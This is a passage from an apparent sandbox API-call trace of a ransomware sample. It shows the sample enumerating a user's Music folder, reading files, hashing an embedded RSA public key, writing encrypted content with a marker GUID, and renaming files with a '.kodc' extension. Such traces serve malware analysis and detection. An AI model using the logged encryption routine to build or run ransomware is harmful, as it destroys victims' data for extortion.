Size=0x10c) returned 0x9b8c428 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad90 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dc30 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.145] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x1328c, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x1328c, lpOverlapped=0x0) returned 1 [0099.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.145] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13291, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.145] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0099.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0099.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.146] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.146] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.146] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.146] CloseHandle (hObject=0x5cc) returned 1 [0099.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0099.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.148] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\X_R1U00TmV8k4bEDrEW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\x_r1u00tmv8k4bedrew.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\X_R1U00TmV8k4bEDrEW.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\x_r1u00tmv8k4bedrew.mp3.kodc")) returned 1 [0099.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.148] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.150] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 1 [0099.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.150] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zJaZRQuuMWfUQbpV5cxu.m4a") returned=".m4a" [0099.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zJaZRQuuMWfUQbpV5cxu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zjazrquumwfuqbpv5cxu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.150] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=94809) returned 1 [0099.150] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.153] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17233, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.153] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.154] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.154] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x17259, lpOverlapped=0x0) returned 1 [0099.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.155] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.156] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.156] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.156] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.156] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.156] GetLastError () returned 0x0 [0099.156] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.156] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.157] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.157] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.157] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17260) returned 0x9ba6d90 [0099.157] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dc30 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dc78 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.158] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331add8 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331adc0 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.160] GetCurrentThreadId () returned 0x42c [0099.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba4da8 [0099.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.161] GetCurrentThreadId () returned 0x42c [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.204] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17259, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.204] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.205] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.205] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.205] CloseHandle (hObject=0x5cc) returned 1 [0099.207] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zJaZRQuuMWfUQbpV5cxu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zjazrquumwfuqbpv5cxu.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zJaZRQuuMWfUQbpV5cxu.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zjazrquumwfuqbpv5cxu.m4a.kodc")) returned 1 [0099.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: 